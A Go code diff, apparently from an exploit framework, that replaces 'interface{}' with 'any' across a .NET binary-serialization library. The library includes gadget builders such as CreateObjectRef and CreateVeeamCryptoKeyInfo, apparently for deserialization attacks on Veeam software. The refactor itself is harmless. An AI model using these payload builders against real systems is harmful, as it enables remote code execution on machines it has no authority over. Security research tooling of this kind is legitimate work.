 	memberValues = append(memberValues, innerSystemClassWithMembersAndTypes) // ID GUID
 	memberValues = append(memberValues, ObjectNullRecord{})                  // KeySetID null
 	memberValues = append(memberValues, 1)                                   // KeyType int32
@@ -1979,7 +1979,7 @@ func CreateVeeamCryptoKeyInfo(url string, formatter string) (string, bool) {
 	memberValues = append(memberValues, 1)                                  // CryptoAlg int 1
 	memberValues = append(memberValues, MemberReferenceRecord{IDRef: 6})    // CryptoAlg int 1
 
-	var arrayMembers []interface{}
+	var arrayMembers []any
 	arrayMembers = append(arrayMembers, BinaryObjectRecord{ObjectID: 7, Value: innerObjRefB64})
 	arraySingleStringRecord := ArraySingleStringRecord{
 		ArrayInfo: ArrayInfo{
@@ -2034,8 +2034,8 @@ func CreateVeeamCryptoKeyInfo(url string, formatter string) (string, bool) {
 }
 
 func CreateObjectRef(url string, formatter string) (string, bool) {
-	var firstMemberValues []interface{}
-	var firstAdditionalInfo []interface{}
+	var firstMemberValues []any
+	var firstAdditionalInfo []any
 	firstClassName := "System.Exception"
 	firstAdditionalInfo = append(firstAdditionalInfo, "System.Runtime.Remoting.ObjRef")
 	firstMemberValues = append(firstMemberValues, MemberReferenceRecord{IDRef: 2})
@@ -2059,7 +2059,7 @@ func CreateObjectRef(url string, formatter string) (string, bool) {
 	}
 
 	// SECOND CLASS, a value for the first one
-	var secondMemberValues []interface{}
+	var secondMemberValues []any
 	secondClassName := "System.Runtime.Remoting.ObjRef"
 	secondMemberValues = append(secondMemberValues, BinaryObjectRecord{ObjectID: 3, Value: url})
 	secondMemberNames := []string{"url"}
diff --git a/dotnet/formatters.go b/dotnet/formatters.go
index 1a17d8e..98b94fd 100644
--- a/dotnet/formatters.go
+++ b/dotnet/formatters.go
@@ -44,7 +44,7 @@ type SOAPEnvelope struct {
 }
 
 type Body struct {
-	Classes []interface{}
+	Classes []any
 }
 
 type ClassDataNode struct { // dynamic element, needs everything defined manually
@@ -52,7 +52,7 @@ type ClassDataNode struct { // dynamic element, needs everything defined manuall
 	ID          string     `xml:"id,attr"`
 	Attrs       []xml.Attr `xml:",attr"`
 	Content     string     `xml:",chardata"`
-	MemberNodes []interface{}
+	MemberNodes []any
 }
 
 type MemberNode struct {
diff --git a/dotnet/general_types.go b/dotnet/general_types.go
index 413cdd9..8eb2e30 100644
--- a/dotnet/general_types.go
+++ b/dotnet/general_types.go
@@ -127,7 +127,7 @@ type ClassTypeInfo struct {
 type MemberTypeInfo struct {
 	BinaryTypeEnums []int
 	BinaryTypes     []string // for convenience not part of the 'official' data structure per MSDN
-	AdditionalInfos []interface{}
+	AdditionalInfos []any
 }
 
 // Self-explanatory, checks if given BinaryTypeEnum expects additionalInfo so that the function can retrieve a value from that array.
@@ -149,7 +149,7 @@ func needsAdditionalInfo(inType string) bool {
 // This is Basically a constructor to build MemberTypeInfo into a binary string as expected by the serialization format.
 // This uses a constructor because there is validation we want to perform such as length checking and ensuring the provided types are valid.
 // ref: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/aa509b5a-620a-4592-a5d8-7e9613e0a03e
-func getMemberTypeInfo(memberTypes []string, memberNames []string, additionalInfo []interface{}) (MemberTypeInfo, bool) {
+func getMemberTypeInfo(memberTypes []string, memberNames []string, additionalInfo []any) (MemberTypeInfo, bool) {
 	// NOTE: the members param is just being used here for length validation since it's a separate object from the corresponding ClassInfo
 	if len(memberNames) != len(memberTypes) {
 		output.PrintFrameworkError("Length mismatch between memberTypes and members in getMemberTypeInfo()")
@@ -158,7 +158,7 @@ func getMemberTypeInfo(memberTypes []string, memberNames []string, additionalInf
 	}
 	addInfoIndex := 0
 	memberTypeInfo := MemberTypeInfo{}
-	var additionalInfos []interface{}
+	var additionalInfos []any
 	memberTypeInfo.AdditionalInfos = additionalInfos
 
 	// build the binary array string of binarytypeenums, which will basically be of type []byte{type0,type1,typeN}
diff --git a/dotnet/records.go b/dotnet/records.go
index a2d58c9..321f63f 100644
--- a/dotnet/records.go
+++ b/dotnet/records.go
@@ -28,13 +28,13 @@ type BinaryArrayRecord struct {
 	Lengths             []int
 	LowerBounds         []int
 	TypeEnum            int // 1byte
-	AdditionalTypeInfo  []interface{}
+	AdditionalTypeInfo  []any
 }
 
 type ClassWithIDRecord struct {
 	ObjectID     int
 	MetadataID   int
-	MemberValues []interface{}
+	MemberValues []any
 }
 
 type BinaryLibraryRecord struct {
@@ -45,14 +45,14 @@ type BinaryLibraryRecord struct {
 type SystemClassWithMembersAndTypesRecord struct {
 	ClassInfo      ClassInfo
 	MemberTypeInfo MemberTypeInfo
-	MemberValues   []interface{}
+	MemberValues   []any
 }
 
 type ClassWithMembersAndTypesRecord struct {
 	ClassInfo      ClassInfo
 	MemberTypeInfo MemberTypeInfo
 	LibraryID      int
-	MemberValues   []interface{}
+	MemberValues   []any
 	BinaryLibrary  BinaryLibraryRecord // Not _really_ supposed to be here per MSDN but I placed it here for convenience
 }
 
@@ -89,12 +89,12 @@ type ArraySinglePrimitiveRecord struct {
 
 type ArraySingleStringRecord struct {
 	ArrayInfo ArrayInfo
-	Members   []interface{}
+	Members   []any
 }
 
 type ArraySingleObjectRecord struct {
 	ArrayInfo ArrayInfo
-	Members   []interface{}
+	Members   []any
 }
 
 func (objectNullMultiple256Record ObjectNullMultiple256Record) GetRecordType() int {